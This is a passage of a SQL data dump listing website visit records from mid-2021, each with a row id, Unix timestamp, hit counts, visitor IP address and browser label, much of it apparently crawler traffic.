,(556203,1624449794,1,1,0,0,'66.220.149.30','other'),(556204,1624450056,1,1,0,0,'173.252.87.18','other'),(556205,1624456935,1,0,1,0,'66.249.70.37',''),(556206,1624456983,1,0,1,0,'66.249.70.41',''),(556207,1624458756,3,3,0,0,'66.249.70.37','chrome'),(556208,1624460078,1,1,0,0,'31.13.103.112','other'),(556210,1624460079,3,3,0,0,'31.13.103.8','other'),(556214,1624460086,1,1,0,0,'31.13.103.116','other'),(556215,1624460885,2,1,1,0,'66.249.70.37',''),(556216,1624461478,1,1,0,0,'173.252.107.19','other'),(556217,1624461481,1,1,0,0,'66.249.70.41','chrome'),(556218,1624461890,1,1,0,0,'66.220.149.31','other'),(556219,1624464680,1,1,0,0,'94.153.13.110','chrome'),(556220,1624464703,1,1,0,0,'91.221.219.11','chrome'),(556221,1624465252,1,1,0,0,'91.196.178.29','chrome'),(556222,1624470233,2,2,0,0,'173.252.79.120','other'),(556223,1624470234,1,1,0,0,'173.252.79.18','other'),(556224,1624470235,2,2,0,0,'173.252.79.9','other'),(556226,1624470354,1,1,0,0,'31.13.127.30','other'),(556227,1624471961,1,0,1,0,'66.249.70.37',''),(556228,1624473894,1,0,1,0,'66.249.70.41',''),(556229,1624474374,1,1,0,0,'84.40.208.49','chrome'),(556230,1624474463,1,1,0,0,'173.252.127.39','other'),(556231,1624475417,1,1,0,0,'66.220.149.40','other'),(556232,1624477637,3,3,0,0,'103.111.30.40','firefox'),(556233,1624478271,1,1,0,0,'5.57.67.201','chrome'),(556234,1624478750,1,1,0,0,'5.58.11.151','chrome'),(556235,1624484260,1,1,0,0,'173.252.111.5','other'),(556238,1624484261,1,1,0,0,'173.252.111.20','other'),(556244,1624484264,1,1,0,0,'192.162.132.19','chrome'),(556245,1624484873,1,1,0,0,'151.73.68.132','chrome'),(556246,1624484877,1,1,0,0,'31.13.127.33','other'),(556247,1624484878,1,1,0,0,'31.13.127.116','other'),(556248,1624494401,1,1,0,0,'142.54.177.5','chrome'),(556249,1624494576,2,1,1,0,'66.249.70.39',''),(556250,1624497540,1,0,1,0,'66.249.70.39',''),(556251,1624499537,1,0,1,0,'66.249.70.39',''),(556252,1624501259,1,0,1,0,'66.249.70.37',''),(556253,1624502024,1,1,0,0,'66.249.70.41','chrome'),(556254,1624503996,1,1,0,0,'212.227.210.161','firefox'),(556255,1624503997,1,1,0,0,'212.227.210.161','firefox'),(556257,1624505450,1,0,1,0,'66.249.70.39',''),(556258,1624506052,1,0,1,0,'66.249.70.37',''),(556259,1624512023,1,1,0,0,'66.249.70.39','chrome'),(556260,1624514576,1,1,0,0,'66.220.149.28','other'),(556261,1624514577,1,1,0,0,'66.220.149.7','other'),(556262,1624514735,1,1,0,0,'31.13.127.119','other'),(556263,1624517222,1,1,0,0,'66.249.70.41','chrome'),(556264,1624519577,1,1,0,0,'176.103.49.32','firefox'),(556265,1624520843,1,1,0,0,'66.249.70.41','chrome'),(556266,1624521799,1,1,0,0,'173.252.111.7','other'),(556267,1624522029,1,1,0,0,'94.153.30.231','other'),(556268,1624526306,1,0,1,0,'66.249.70.39',''),(556269,1624528494,1,0,1,0,'66.249.70.39',''),(556270,1624530997,1,1,0,0,'93.170.117.141','chrome'),(556271,1624531735,1,0,1,0,'66.249.70.41',''),(556272,1624532027,1,0,1,0,'66.249.70.39',''),(556273,1624533061,1,0,1,0,'66.249.70.41',''),(556274,1624533699,1,0,1,0,'66.249.70.39',''),(556275,1624534005,1,1,0,0,'173.252.111.10','other'),(556276,1624540978,1,1,0,0,'31.13.127.2','other'),(556277,1624540979,1,1,0,0,'31.13.127.16','other'),(556278,1624543322,1,0,1,0,'66.249.70.39',''),(556279,1624544779,1,1,0,0,'173.252.95.26','other'),(556280,1624547378,1,0,1,0,'66.249.70.37',''),(556281,1624549772,1,0,1,0,'66.249.70.41',''),(556282,1624551313,1,1,0,0,'66.220.149.2','other'),(556283,1624552432,1,1,0,0,'66.249.70.39','chrome'),(556284,1624558983,3,3,0,0,'157.230.2.68','firefox'),(556285,1624564618,1,1,0,0,'69.171.249.19','other'),(556286,1624565485,3,3,0,0,'132.148.130.78','firefox'),(556287,1624565555,1,1,0,0,'37.11.28.187','chrome'),(556288,1624572744,1,1,0,0,'23.228.109.147','chrome'),(556289,1624574822,1,0,1,0,'66.249.70.39',''),(556290,1624580911,1,0,1,0,'66.249.70.39',''),(556291,1624582602,1,0,1,0,'66.249.70.39',''),(556292,1624583966,1,0,1,0,'66.249.70.37',''),(556293,1624585645,1,0,1,0,'66.249.70.39',''),(556294,1624593951,1,1,0,0,'91.196.178.187','chrome'),(556295,1624593957,1,1,0,0,'66.220.149.35','other'),(556297,1624593958,1,1,0,0,'66.220.149.7','other'),(556304,1624593959,1,1,0,0,'66.220.149.30','other'),(556305,1624601776,1,1,0,0,'173.252.107.116','other'),(556306,1624601777,1,1,0,0,'173.252.107.2','other'),(556309,1624610236,1,0,1,0,'66.249.70.39',''),(556310,1624612856,1,0,1,0,'66.249.70.39',''),(556311,1624614443,1,1,0,0,'66.249.70.41','chrome'),(556312,1624619079,1,1,0,0,'31.13.103.16','other'),(556313,1624619080,1,1,0,0,'31.13.103.14','other'),(556314,1624619240,1,1,0,0,'173.252.87.6','other'),(556315,1624619241,1,1,0,0,'173.252.87.3','other'),(556316,1624625341,1,0,1,0,'66.249.70.41',''),(556317,1624629757,1,0,1,0,'66.249.70.39',''),(556318,1624639280,1,1,0,0,'46.135.96.244','chrome'),(556319,1624649475,1,1,0,0,'37.73.49.130','chrome'),(556320,1624653515,1,1,0,0,'66.249.70.41','chrome'),(556321,1624656932,1,1,0,0,'54.190.10.57','chrome'),(556322,1624662969,1,0,1,0,'66.249.70.37',''),(556323,1624663503,1,0,1,0,'66.249.70.41',''),(556324,1624684197,1,1,0,0,'66.249.70.41','chrome'),(556325,1624685817,1,1,0,0,'31.13.127.21','other'),(556326,1624693415,1,1,0,0,'66.249.70.41','chrome'),(556327,1624699329,1,0,1,0,'66.249.70.37',''),(556328,1624701586,1,1,0,0,'31.13.103.5','other'),(556329,1624707363,1,1,0,0,'34.77.162.25','other'),(556330,1624714581,1,1,0,0,'66.249.70.41','chrome'),(556331,1624716133,2,0,2,0,'66.249.70.39',''),(556332,1624722433,1,0,1,0,'66.249.70.39',''),(556333,1624728383,1,1,0,0,'66.249.70.39','chrome'),(556334,1624728432,1,1,0,0,'54.187.96.32','firefox'),(556335,1624733133,1,1,0,0,'46.211.60.111','chrome'),(556336,1624733137,1,1,0,0,'173.252.95.5','other'),(556340,1624733138,1,1,0,0,'173.252.95.35','other'),(556343,1624733139,1,1,0,0,'173.252.95.120','other'),(556345,1624736536,1,1,0,0,'61.244.70.248','firefox'),(556346,1624736607,1,1,0,0,'185.138.231.194','other'),(556347,1624738779,1,1,0,0,'193.19.254.39','chrome'),(556348,1624739080,1,0,1,0,'66.249.70.37',''),(556349,1624739210,1,0,1,0,'66.249.70.41',''),(556350,1624749113,1,0,1,0,'66.249.70.41',''),(556351,1624749362,2,2,0,0,'66.249.70.37','chrome'),(556352,1624751829,1,1,0,0,'92.118.160.41','other'),(556353,1624759622,1,0,1,0,'66.249.70.39',''),(556354,1624764890,1,1,0,0,'66.249.70.39','chrome'),(556355,1624770069,1,1,0,0,'66.249.70.41','chrome'),(556356,1624778093,1,0,1,0,'66.249.70.41',''),(556357,1624778722,1,1,0,0,'46.211.3.36','chrome'),(556358,1624785772,1,0,1,0,'66.249.70.41',''),(556359,1624792993,1,0,1,0,'66.249.70.39',''),(556360,1624796981,1,1,0,0,'185.237.217.11','chrome'),(556361,1624798585,1,0,1,0,'66.249.70.39',''),(556362,1624799717,1,1,0,0,'66.249.70.41','chrome'),(556363,1624800552,1,0,1,0,'66.249.70.39',''),(556364,1624800654,4,4,0,0,'109.70.111.112','chrome'),(556365,1624802566,1,0,1,0,'66.249.70.37',''),(556366,1624815144,1,1,0,0,'66.249.70.39','chrome'),(556367,1624819601,1,1,0,0,'173.252.111.119','other'),(556368,1624819605,1,1,0,0,'173.252.111.116','other'),(556369,1624819636,1,1,0,0,'173.252.111.118','other'),(556371,1624819637,1,1,0,0,'173.252.111.14','other'),(556375,1624819638,1,1,0,0,'173.252.111.10','other'),(556376,1624819648,1,1,0,0,'31.13.103.18','other'),(556377,1624819649,1,1,0,0,'69.171.251.11','other'),(556378,1624822007,1,1,0,0,'178.219.98.111','chrome'),(556379,1624822008,1,1,0,0,'173.252.95.25','other'),(556382,1624822009,3,3,0,0,'173.252.95.27','other'),(556387,1624822010,1,1,0,0,'173.252.95.22','other'),(556388,1624823280,1,0,1,0,'66.249.70.41',''),(556389,1624825134,1,0,1,0,'66.249.70.39',''),(556390,1624833013,1,1,0,0,'66.249.70.41','chrome'),(556391,1624839991,1,1,0,0,'92.118.160.17','other'),(556392,1624841190,1,0,1,0,'66.249.70.37',''),(556393,1624841819,1,0,1,0,'66.249.70.41',''),(556394,1624845273,1,0,1,0,'66.249.70.41',''),(556395,1624846829,1,1,0,0,'66.249.70.41','chrome'),(556396,1624848459,1,1,0,0,'66.249.70.37','chrome'),(556397,1624848545,1,0,1,0,'66.249.70.41',''),(556398,1624848593,1,1,0,0,'66.249.70.39','chrome'),(556399,1624850417,1,0,1,0,'66.249.70.37',''),(556400,1624857424,1,0,1,0,'66.249.70.41',''),(556401,1624864544,1,1,0,0,'162.55.212.176','chrome'),(556402,1624869774,1,1,0,0,'69.171.249.6','other'),(556403,1624884386,1,0,1,0,'66.249.70.39',''),(556404,1624884954,1,1,0,0,'173.252.111.11','other'),(556405,1624884955,1,1,0,0,'173.252.111.16','other'),(556406,1624888954,2,0,2,0,'66.249.70.37',''),(556407,1624890330,1,1,0,0,'173.252.111.17','other'),(556408,1624907341,1,0,1,0,'66.249.70.39',''),(556409,1624907588,1,1,0,0,'66.249.70.41','chrome'),(556410,1624919581,1,1,0,0,'45.129.18.33','chrome'),(556411,1624923832,1,1,0,0,'31.13.103.23','other'),(556415,1624923833,2,2,0,0,'31.13.103.117','other'),(556418,1624934532,1,1,0,0,'34.77.162.22','other'),(556419,1624944036,1,0,1,0,'66.249.70.37',''),(556420,1624949713,2,0,2,0,'66.249.70.37',''),(556421,1624949958,3,0,3,0,'66.249.70.41',''),(556422,1624950364,1,0,1,0,'66.249.70.39',''),(556423,1624955905,1,1,0,0,'66.249.70.37','chrome'),(556424,1624956807,1,0,1,0,'66.249.70.39',''),(556425,1624956839,1,1,0,0,'66.249.70.37','chrome'),(556426,1624963979,1,1,0,0,'66.249.70.41','chrome'),(556427,1624966187,1,0,1,0,'66.249.70.37',''),(556428,1624973895,2,2,0,0,'100.21.218.158','firefox'),(556429,1624976668,1,1,0,0,'31.13.127.4','other'),(556430,1624979132,1,1,0,0,'31.13.103.14','other'),(556431,1624979134,1,1,0,0,'31.13.103.21','other'),(556432,1624979980,2,2,0,0,'66.249.70.37','chrome'),(556433,1624981744,1,1,0,0,'66.249.70.37','chrome'),(556434,1624982845,2,2,0,0,'23.228.109.147','chrome'),(556435,1624984294,1,1,0,0,'173.252.111.10','other'),(556436,1624989032,1,1,0,0,'66.249.70.39','chrome'),(556437,1624989669,3,3,0,0,'213.108.241.243','firefox'),(556438,1624993462,1,1,0,0,'66.249.70.39','chrome'),(556439,1625000249,1,0,1,0,'66.249.70.37',''),(556440,1625002499,2,1,1,0,'66.249.70.39',''),(556441,1625003278,1,0,1,0,'66.249.70.41',''),(556442,1625004787,1,1,0,0,'66.249.70.37','chrome'),(556443,1625006444,1,0,1,0,'66.249.70.37',''),(556444,1625007255,1,0,1,0,'66.249.70.39',''),(556445,1625020357,1,1,0,0,'92.112.152.141','chrome'),(556446,1625035811,1,1,0,0,'173.252.111.118','other'),(556447,1625035817,1,1,0,0,'173.252.111.117','other'),(556448,1625040129,1,1,0,0,'109.70.106.130','other'),(556449,1625040557,2,2,0,0,'66.249.70.39','chrome'),(556450,1625040563,1,1,0,0,'66.249.70.37','chrome'),(556451,1625048192,1,1,0,0,'66.249.70.37','chrome'),(556452,1625053880,1,0,1,0,'66.249.70.39',''),(556453,1625058330,2,2,0,0,'66.249.70.39','chrome'),(556454,1625064075,2,2,0,0,'92.53.96.150','firefox'),(556456,1625073501,2,2,0,0,'45.82.83.212','chrome'),(556457,1625074011,1,0,1,0,'66.249.70.39',''),(556458,1625078049,1,1,0,0,'66.249.70.39','chrome'),(556459,1625081288,1,1,0,0,'66.249.70.39','chrome'),(556460,1625082865,1,1,0,0,'95.47.59.236','chrome'),(556461,1625098049,3,3,0,0,'35.198.105.76','firefox'),(556462,1625102590,1,1,0,0,'5.255.253.186','other'),(556463,1625105944,1,0,1,0,'66.249.70.37',''),(556464,1625108542,1,1,0,0,'213.180.203.14','other'),(556465,1625114260,1,0,1,0,'66.249.70.39',''),(556466,1625126882,1,0,1,0,'66.249.70.39',''),(556467,1625126896,1,1,0,0,'23.228.109.147','chrome'),(556468,1625130716,1,1,0,0,'66.249.70.37','chrome'),(556469,1625130901,1,1,0,0,'51.15.195.246','other'),(556470,1625135268,1,0,1,0,'66.249.70.37',''),(556471,1625141959,1,0,1,0,'66.249.70.37',''),(556472,1625147760,1,0,1,0,'66.249.70.41',''),(556473,1625148484,1,1,0,0,'66.249.70.39','chrome'),(556474,1625148906,1,1,0,0,'66.249.70.41','chrome'),(556475,1625153905,1,1,0,0,'141.8.142.70','other'),(556476,1625154020,1,1,0,0,'185.237.217.11','chrome'),(556477,1625154674,1,1,0,0,'173.252.111.23','other'),(556478,1625154675,1,1,0,0,'173.252.111.16','other'),(556479,1625160476,1,1,0,0,'141.8.142.70','other'),(556480,1625164148,1,1,0,0,'173.252.111.17','other'),(556481,1625164149,1,1,0,0,'173.252.111.116','other'),(556482,1625164685,1,1,0,0,'94.158.95.224','chrome'),(556483,1625167734,1,1,0,0,'173.252.111.2','other'),(556484,1625171141,1,1,0,0,'141.8.142.70','other'),(556485,1625173078,3,3,0,0,'142.93.113.173','firefox'),(556487,1625173955,2,2,0,0,'220.181.77.162','other'),(556488,1625181230,1,1,0,0,'107.150.46.51','chrome'),(556489,1625182974,1,1,0,0,'66.249.70.37','chrome'),(556490,1625186358,1,1,0,0,'66.249.70.37','chrome'),(556491,1625198624,1,1,0,0,'66.249.70.41','chrome'),(556492,1625198706,3,3,0,0,'91.134.254.82','firefox'),(556493,1625202638,1,1,0,0,'5.255.253.117','other'),(556494,1625202640,1,1,0,0,'213.180.203.107','other'),(556495,1625202642,1,1,0,0,'5.255.253.96','other'),(556496,1625202645,1,1,0,0,'213.180.203.139','other'),(556497,1625202648,1,1,0,0,'5.45.207.78','other'),(556498,1625202650,2,2,0,0,'213.180.203.9','other'),(556499,1625202656,2,2,0,0,'5.255.253.94','other'),(556500,1625202658,2,2,0,0,'141.8.142.70','other'),(556501,1625202661,2,2,0,0,'213.180.203.112','other'),(556502,1625202663,1,1,0,0,'213.180.203.13','other'),(556503,1625202666,1,1,0,0,'5.255.231.115','other'),(556504,1625202668,1,1,0,0,'5.255.231.142','other'),(556505,1625202670,1,1,0,0,'5.255.231.111','other'),(556506,1625202707,1,1,0,0,'5.45.207.139','other'),(556507,1625202743,1,1,0,0,'5.255.231.69','other'),(556508,1625202762,1,1,0,0,'213.180.203.93','other'),(556509,1625202772,1,1,0,0,'5.255.231.100','other'),(556510,1625205761,1,0,1,0,'66.249.70.37',''),(556511,1625209650,1,0,1,0,'66.249.70.37',''),(556512,1625209738,1,1,0,0,'66.249.70.37','chrome'),(556513,1625212357,1,1,0,0,'23.228.109.147','chrome'),(556514,1625212674,1,1,0,0,'141.8.142.70','other'),(556515,1625213121,1,1,0,0,'51.158.109.3','other'),(556516,1625215711,1,1,0,0,'141.8.142.70','other'),(556517,1625223956,1,1,0,0,'31.13.103.4','other'),(556518,1625225148,2,2,0,0,'66.249.93.22','chrome'),(556520,1625225189,1,1,0,0,'185.237.217.11','chrome'),(556521,1625225453,1,1,0,0,'66.249.70.41','chrome'),(556522,1625226133,1,1,0,0,'185.237.217.11','chrome'),(556523,1625226264,1,1,0,0,'173.252.111.9','other'),(556525,1625226265,2,2,0,0,'173.252.111.22','other'),(556527,1625226266,1,1,0,0,'173.252.111.21','other'),(556528,1625226267,1,1,0,0,'173.252.111.119','other'),(556529,1625226268,1,1,0,0,'173.252.111.120','other'),(556530,1625226270,2,2,0,0,'173.252.107.23','other'),(556531,1625226272,1,1,0,0,'66.220.149.4','other'),(556534,1625226295,1,1,0,0,'91.196.179.33','chrome'),(556535,1625226435,1,1,0,0,'94.153.49.19','chrome'),(556536,1625226543,1,1,0,0,'91.196.179.33','other'),(556537,1625226570,1,1,0,0,'173.252.87.9','other'),(556538,1625226661,1,1,0,0,'91.196.177.46','chrome'),(556539,1625226727,1,1,0,0,'91.196.178.162','other'),(556540,1625226736,1,1,0,0,'185.237.217.15','chrome'),(556541,1625227227,1,1,0,0,'185.237.217.11','chrome'),(556542,1625228140,1,1,0,0,'185.237.217.11','chrome'),(556543,1625228874,1,1,0,0,'173.252.111.20','other'),(556544,1625228875,2,2,0,0,'173.252.111.22','other'),(556546,1625228909,1,1,0,0,'31.13.127.28','other'),(556547,1625229115,1,1,0,0,'173.252.111.24','other'),(556549,1625229228,1,1,0,0,'69.171.251.3','other'),(556550,1625229256,1,1,0,0,'185.237.217.11','chrome'),(556551,1625229961,1,1,0,0,'173.252.111.3','other'),(556552,1625229962,1,1,0,0,'173.252.111.6','other'),(556554,1625229963,1,1,0,0,'173.252.111.21','other'),(556555,1625229985,1,1,0,0,'173.252.107.21','other'),(556556,1625230021,1,1,0,0,'173.252.127.11','other'),(556557,1625230202,1,1,0,0,'46.133.2.58','chrome'),(556558,1625230713,1,1,0,0,'128.124.228.241','chrome'),(556559,1625230916,1,1,0,0,'185.237.217.11','chrome'),(556560,1625231463,1,1,0,0,'94.153.14.141','chrome'),(556561,1625231787,1,1,0,0,'86.49.225.100','other'),(556562,1625232103,1,1,0,0,'185.237.217.11','chrome'),(556563,1625232336,1,1,0,0,'88.155.81.242','chrome'),(556564,1625232553,1,1,0,0,'173.252.111.15','other'),(556565,1625232554,1,1,0,0,'173.252.111.8','other'),(556567,1625232555,1,1,0,0,'173.252.111.116','other'),(556568,1625232565,1,1,0,0,'91.196.178.106','chrome'),(556569,1625232755,1,1,0,0,'46.219.245.214','chrome'),(556570,1625232757,1,1,0,0,'91.196.178.71','chrome'),(556571,1625232904,2,2,0,0,'173.252.111.16','other'),(556572,1625232906,1,1,0,0,'173.252.111.12','other'),(556573,1625233224,1,1,0,0,'37.55.227.131','chrome'),(556574,1625233499,1,1,0,0,'46.211.8.101','chrome'),(556575,1625233663,1,1,0,0,'88.155.2.217','chrome'),(556576,1625234155,2,0,2,0,'66.249.70.57',''),(556577,1625235688,1,1,0,0,'185.237.217.11','chrome'),(556578,1625236087,1,1,0,0,'69.171.249.5','other'),(556579,1625236176,1,1,0,0,'142.182.180.249','firefox'),(556580,1625237095,1,1,0,0,'91.196.178.124','chrome'),(556581,1625237652,1,1,0,0,'173.252.79.10','other'),(556583,1625240599,1,1,0,0,'91.196.178.46','chrome'),(556584,1625240673,1,1,0,0,'185.237.217.11','chrome'),(556585,1625241828,1,1,0,0,'91.196.178.43','chrome'),(556586,1625242861,1,1,0,0,'94.153.86.249','chrome'),(556587,1625242883,1,1,0,0,'66.220.149.41','other'),(556588,1625242884,1,1,0,0,'66.220.149.52','other'),(556589,1625245308,1,1,0,0,'185.237.217.4','chrome'),(556590,1625245312,1,1,0,0,'173.252.79.22','other'),(556592,1625245313,1,1,0,0,'173.252.79.117','other'),(556596,1625245314,1,1,0,0,'173.252.79.24','other'),(556598,1625245650,1,1,0,0,'173.252.111.117','other'),(556599,1625246238,1,1,0,0,'92.112.124.100','chrome'),(556600,1625246521,1,1,0,0,'185.237.217.13','chrome'),(556601,1625246836,1,1,0,0,'188.163.72.104','chrome'),(556602,1625247898,1,1,0,0,'173.252.111.16','other'),(556603,1625248385,1,1,0,0,'46.211.77.232','chrome'),(556604,1625250789,2,2,0,0,'69.171.231.120','other'),(556605,1625250790,1,1,0,0,'69.171.231.118','other'),(556606,1625251074,1,1,0,0,'185.237.217.11','chrome'),(556607,1625251121,1,1,0,0,'95.134.184.52','chrome'),(556608,1625254017,1,1,0,0,'159.224.216.39','other'),(556609,1625254172,1,1,0,0,'188.163.32.24','chrome'),(556610,1625254224,1,1,0,0,'46.211.70.139','chrome'),(556611,1625255057,3,3,0,0,'185.138.230.125','other'),(556612,1625257492,1,1,0,0,'46.133.176.246','chrome'),(556613,1625263544,1,1,0,0,'82.202.90.48','chrome'),(556614,1625263599,1,0,1,0,'66.249.70.41',''),(556615,1625264799,1,1,0,0,'66.249.70.41','chrome'),(556616,1625265814,1,1,0,0,'185.237.217.11','chrome'),(556617,1625270892,1,1,0,0,'31.13.103.17','other'),(556618,1625273195,1,1,0,0,'31.13.103.12','other'),(556619,1625274303,1,1,0,0,'66.249.70.37','chrome'),(556620,1625279937,1,1,0,0,'66.249.70.41','chrome'),(556621,1625284237,1,1,0,0,'185.237.217.11','chrome'),(556622,1625284514,1,1,0,0,'107.150.48.229','chrome'),(556623,1625287166,1,1,0,0,'66.249.70.37','chrome'),(556624,1625289110,1,1,0,0,'66.249.70.39','chrome'),(556625,1625291796,1,0,1,0,'66.249.70.37',''),(556626,1625291972,1,1,0,0,'31.13.127.27','other'),(556627,1625291973,1,1,0,0,'31.13.127.23','other'),(556628,1625292199,1,1,0,0,'185.237.217.11','chrome'),(556629,1625293925,1,1,0,0,'128.124.11.215','chrome'),(556630,1625294753,1,1,0,0,'66.220.149.42','other'),(556631,1625298247,1,0,1,0,'66.249.70.41',''),(556632,1625300923,1,1,0,0,'66.249.70.39','chrome'),(556633,1625301927,1,1,0,0,'23.228.109.147','chrome'),(556634,1625303773,1,1,0,0,'91.196.178.153','chrome'),(556635,1625308810,1,1,0,0,'66.249.70.37','chrome'),(556636,1625312355,1,1,0,0,'66.249.70.37','chrome'),(556637,1625316694,1,1,0,0,'185.237.217.11','chrome'),(556638,1625318800,1,0,1,0,'66.249.70.41',''),(556639,1625318803,1,0,1,0,'66.249.70.37',''),(556640,1625329015,2,2,0,0,'51.210.109.41','firefox'),(556642,1625330245,1,1,0,0,'66.249.70.39','chrome'),(556643,1625333751,1,1,0,0,'66.249.70.37','chrome'),(556644,1625333926,1,1,0,0,'66.249.70.41','chrome'),(556645,1625334880,1,1,0,0,'66.249.70.39','chrome'),(556646,1625335852,1,1,0,0,'173.252.111.21','other'),(556647,1625336146,3,3,0,0,'62.221.254.190','firefox'),(556648,1625337254,1,1,0,0,'46.211.26.228','chrome'),(556649,1625341519,1,1,0,0,'173.249.22.173','chrome'),(556650,1625343579,1,1,0,0,'66.249.70.39','chrome'),(556651,1625346072,1,0,1,0,'66.249.70.39',''),(556652,1625348916,1,1,0,0,'66.249.70.41','chrome'),(556653,1625352776,1,0,1,0,'66.249.70.39',''),(556654,1625358933,1,1,0,0,'66.249.70.39','chrome'),(556655,1625368133,1,1,0,0,'5.255.253.96','other'),(556656,1625369251,1,0,1,0,'66.249.70.37',''),(556657,1625370472,1,1,0,0,'5.255.231.115','other'),(556658,1625377021,1,1,0,0,'5.255.231.69','other'),(556659,1625381100,2,1,1,0,'66.249.70.37',''),(556660,1625384112,1,1,0,0,'91.196.178.207','chrome'),(556661,1625390021,1,1,0,0,'173.252.111.19','other'),(556662,1625390022,1,1,0,0,'173.252.111.24','other'),(556664,1625390023,1,1,0,0,'173.252.111.113','other'),(556665,1625390024,1,1,0,0,'66.220.149.43','other'),(556666,1625401466,1,1,0,0,'69.171.251.12','other'),(556667,1625401469,1,1,0,0,'69.171.231.120','other'),(556668,1625405210,1,0,1,0,'66.249.70.37',''),(556669,1625407092,1,1,0,0,'66.249.70.41','chrome'),(556670,1625407157,3,3,0,0,'66.249.70.39','chrome'),(556671,1625407200,4,4,0,0,'66.249.70.37','chrome'),(556672,1625409035,3,3,0,0,'66.249.70.39','chrome'),(556673,1625409101,1,1,0,0,'66.249.70.41','chrome'),(556674,1625410564,1,1,0,0,'66.249.70.41','chrome'),(556675,1625411741,1,1,0,0,'107.150.63.173','chrome'),(556676,1625414539,1,1,0,0,'66.249.70.41','chrome'),(556677,1625415172,2,2,0,0,'66.249.70.39','chrome'),(556678,1625418597,1,0,1,0,'66.249.70.39',''),(556679,1625420370,1,1,0,0,'66.249.70.39','chrome'),(556680,1625421413,1,1,0,0,'66.249.70.41','chrome'),(556681,1625421855,1,1,0,0,'66.249.70.37','chrome'),(556682,1625424405,1,1,0,0,'66.249.70.37','chrome'),(556683,1625429172,2,2,0,0,'66.249.70.41','chrome'),(556684,1625430125,1,1,0,0,'91.196.178.18','chrome'),(556685,1625433200,1,1,0,0,'141.8.142.70','other'),(556686,1625438475,1,0,1,0,'66.249.70.41',''),(556687,1625445174,1,0,1,0,'66.249.70.41',''),(556688,1625475828,1,1,0,0,'31.13.127.6','other'),(556689,1625479687,1,1,0,0,'141.8.142.70','other'),(556690,1625481353,1,1,0,0,'173.252.111.4','other'),(556691,1625491629,1,0,1,0,'66.249.70.39',''),(556692,1625496499,1,1,0,0,'31.13.127.118','other'),(556694,1625508277,1,1,0,0,'34.78.185.17','firefox'),(556696,1625530555,3,3,0,0,'5.23.51.104','firefox'),(556697,1625543077,1,1,0,0,'66.249.70.37','chrome'),(556698,1625546374,1,1,0,0,'66.249.70.41','chrome'),(556699,1625546377,1,1,0,0,'31.13.103.19','other'),(556700,1625547728,2,2,0,0,'66.249.70.41','chrome'),(556701,1625549310,1,0,1,0,'66.249.70.39',''),(556702,1625562443,1,1,0,0,'173.252.111.15','other'),(556703,1625562444,1,1,0,0,'173.252.111.22','other'),(556704,1625568923,1,1,0,0,'34.77.162.26','other'),(556705,1625570336,1,1,0,0,'45.149.83.247','other'),(556706,1625570337,1,1,0,0,'45.149.83.247','chrome'),(556707,1625572593,1,1,0,0,'173.252.111.20','other'),(556708,1625572594,1,1,0,0,'173.252.111.8','other'),(556709,1625572626,1,1,0,0,'69.171.251.8','other'),(556710,1625572629,1,1,0,0,'173.252.111.16','other'),(556712,1625573108,1,1,0,0,'66.249.70.39','chrome'),(556713,1625573113,1,1,0,0,'95.135.199.223','chrome'),(556714,1625575822,1,1,0,0,'66.249.70.41','chrome'),(556715,1625577738,1,1,0,0,'62.80.164.126','chrome'),(556716,1625578050,1,0,1,0,'66.249.70.41',''),(556717,1625578067,1,0,1,0,'66.249.70.39',''),(556718,1625579943,1,0,1,0,'66.249.70.39',''),(556719,1625582211,1,1,0,0,'173.252.111.4','other'),(556720,1625582212,1,1,0,0,'173.252.111.2','other'),(556721,1625582566,1,1,0,0,'69.171.251.22','other'),(556722,1625589510,2,2,0,0,'66.249.70.39','chrome'),(556723,1625594457,1,1,0,0,'185.237.217.11','chrome'),(556724,1625598333,1,1,0,0,'66.249.70.39','chrome'),(556725,1625600762,1,1,0,0,'31.13.103.16','other'),(556726,1625610104,1,1,0,0,'66.249.70.37','chrome'),(556727,1625613042,2,2,0,0,'23.228.109.147','chrome'),(556728,1625630861,1,0,1,0,'66.249.70.39',''),(556729,1625631812,1,1,0,0,'185.154.154.104','chrome'),(556730,1625632005,2,2,0,0,'54.203.73.198','firefox'),(556731,1625634071,1,0,1,0,'66.249.70.37',''),(556732,1625638324,1,0,1,0,'66.249.70.39',''),(556733,1625643509,1,1,0,0,'45.129.18.145','chrome'),(556734,1625647845,3,3,0,0,'23.228.109.147','chrome'),(556735,1625659178,4,4,0,0,'54.245.151.37','chrome'),(556736,1625664611,1,0,1,0,'66.249.70.37',''),(556737,1625674332,1,1,0,0,'185.154.154.104','chrome'),(556738,1625680852,1,1,0,0,'69.64.52.38','firefox'),(556741,1625691786,1,1,0,0,'66.249.70.41','chrome'),(556742,1625698569,3,3,0,0,'213.149.103.132','firefox'),(556743,1625709677,1,1,0,0,'66.249.70.37','chrome'),(556744,1625723149,2,1,1,0,'66.249.70.37',''),(556745,1625726315,1,1,0,0,'165.22.41.18','other'),(556746,1625727524,1,1,0,0,'134.122.7.14','other'),(556747,1625734356,1,1,0,0,'185.237.217.11','chrome'),(556748,1625740853,5,5,0,0,'3.142.196.210','chrome'),(556749,1625747176,1,1,0,0,'66.249.70.39','chrome'),(556750,1625750904,1,0,1,0,'66.249.70.37',''),(556751,1625764512,1,1,0,0,'66.249.70.37','chrome'),(556752,1625778117,1,0,1,0,'66.249.70.39',''),(556753,1625819089,1,0,1,0,'66.249.70.39',''),(556754,1625821425,1,1,0,0,'66.249.70.37','chrome'),(556755,1625823326,1,1,0,0,'31.13.127.27','other'),(556756,1625828032,1,1,0,0,'46.133.72.137','chrome'),(556757,1625830686,1,1,0,0,'66.249.70.37','chrome'),(556758,1625834420,1,1,0,0,'66.249.70.39','chrome'),(556759,1625837304,1,0,1,0,'66.249.70.39',''),(556760,1625837997,1,1,0,0,'185.237.217.11','chrome'),(556761,1625838142,2,2,0,0,'173.252.111.9','other'),(556763,1625838143,1,1,0,0,'173.252.111.2','other'),(556764,1625838144,4,4,0,0,'173.252.111.5','other'),(556765,1625838145,1,1,0,0,'173.252.111.21','other'),(556766,1625838146,1,1,0,0,'173.252.111.120','other'),(556769,1625838149,1,1,0,0,'173.252.111.12','other'),(556771,1625838150,1,1,0,0,'173.252.111.118','other'),(556772,1625838151,1,1,0,0,'173.252.111.24','other'),(556773,1625838152,1,1,0,0,'173.252.111.19','other'),(556774,1625838514,1,1,0,0,'91.196.176.13','chrome'),(556775,1625838714,1,1,0,0,'178.92.75.98','chrome'),(556776,1625839216,1,1,0,0,'46.211.57.244','chrome'),(556777,1625842214,1,1,0,0,'176.125.52.109','chrome'),(556778,1625842937,1,1,0,0,'46.133.240.209','chrome'),(556779,1625846862,1,1,0,0,'91.196.178.71','chrome'